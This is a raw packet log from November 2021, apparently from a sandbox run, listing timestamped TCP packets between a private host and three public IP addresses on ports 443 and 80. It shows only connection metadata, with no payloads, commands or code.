Nov 11, 2021 20:35:29.762244940 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.762269974 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:29.762586117 CET	49746	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:29.762598991 CET	443	49746	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:33.286147118 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.286190987 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.286298990 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.292198896 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.292224884 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.332607985 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.355088949 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.355134964 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.371582031 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.371598005 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.374650002 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.374768019 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.391681910 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.391897917 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.392049074 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.440787077 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.440824032 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.453526974 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.455398083 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.455548048 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.455576897 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:33.455593109 CET	49747	443	192.168.2.3	172.67.207.136
Nov 11, 2021 20:35:33.455605030 CET	443	49747	172.67.207.136	192.168.2.3
Nov 11, 2021 20:35:37.443340063 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.443382978 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.443478107 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.445126057 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.445153952 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.507056952 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.508002043 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.508054018 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.508888960 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.508904934 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.512006044 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.512106895 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.514516115 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.514724970 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.514826059 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.514852047 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.600749016 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.600879908 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.604242086 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.604271889 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:37.604300022 CET	49748	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:37.604312897 CET	443	49748	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.740056038 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.740098953 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.740302086 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.744684935 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.744713068 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.806196928 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.807106972 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.807138920 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.810728073 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.810741901 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.812640905 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.812771082 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.814904928 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.815067053 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.815124035 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.856882095 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.890927076 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.891064882 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.891472101 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.891506910 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.891524076 CET	49750	443	192.168.2.3	172.67.139.144
Nov 11, 2021 20:35:48.891536951 CET	443	49750	172.67.139.144	192.168.2.3
Nov 11, 2021 20:35:48.935138941 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.951818943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.952110052 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.952845097 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.969556093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993185043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993232965 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993280888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993334055 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.993354082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993401051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993438959 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.993448973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993493080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993542910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993587017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993638039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993653059 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.993690014 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993740082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993783951 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.993789911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993841887 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993886948 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993911028 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.993916988 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.993932009 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.993976116 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994008064 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994067907 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994101048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994153023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994153976 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.994187117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994240046 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994293928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994299889 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.994322062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994373083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994405985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994462013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994494915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994548082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994571924 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.994589090 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994590998 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.994633913 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994682074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994724989 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994741917 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.994781017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994812965 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.994821072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994854927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994908094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994940042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994992971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.994993925 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.995039940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995083094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995088100 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.995135069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995203972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995245934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995289087 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.995292902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995337009 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995368958 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:48.995381117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:48.995476007 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.011882067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.011935949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.011984110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012012959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012038946 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012069941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012114048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012146950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012168884 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012206078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012257099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012295008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012329102 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012388945 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012413979 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012438059 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012482882 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012516022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012568951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012602091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012655020 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012661934 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012698889 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012732983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012770891 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012777090 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012787104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012830973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012897968 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.012938976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.012970924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013025045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013056040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013109922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013143063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013192892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013225079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013273001 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.013277054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013283968 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.013309956 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013360977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013396978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013426065 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.013444901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013492107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013523102 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013562918 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.013575077 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013607979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013659000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013691902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013746977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013751984 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.013787985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013819933 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013875008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013916969 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013950109 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.013987064 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.014019012 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.014071941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.014102936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.014142036 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.014147997 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.014844894 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.030607939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030646086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030708075 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030754089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030791044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030832052 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.030833960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030878067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030920982 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.030922890 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.030962944 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031001091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031060934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031100988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031147003 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031152010 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.031181097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031227112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031260014 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031311035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031342983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031390905 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.031397104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031399012 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.031425953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031465054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031497955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031553030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031586885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031595945 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.031635046 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031668901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031721115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031752110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031804085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031836033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031883955 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.031888008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031891108 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.031940937 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.031989098 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032047033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032078028 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032136917 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032147884 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.032171965 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032228947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032273054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032330990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032363892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032381058 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.032413960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032452106 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032514095 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032546043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032582998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032596111 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.032625914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032682896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032726049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032773018 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.032782078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032818079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.032895088 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.033175945 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.049541950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049580097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049639940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049681902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049731970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049756050 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.049766064 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049823999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049832106 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.049855947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049911022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049942970 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.049947023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.049984932 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050038099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050071955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050127029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050168991 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.050180912 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050214052 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050266981 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050298929 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050337076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050369978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050414085 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.050420046 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.050424099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050456047 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050513983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050549030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050595999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050628901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050652027 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.050685883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050720930 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050770044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050801039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050853014 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050884962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050930023 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.050936937 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.050937891 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.050981045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051012039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051068068 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051103115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051151991 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051179886 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051192999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051229954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051276922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051310062 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051317930 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051351070 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051404953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051436901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051490068 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051516056 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051522017 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051529884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051564932 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051616907 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.051620007 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051651955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051707983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051740885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051794052 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.051825047 CET	80	49751	172.67.196.11	192.168.2.3
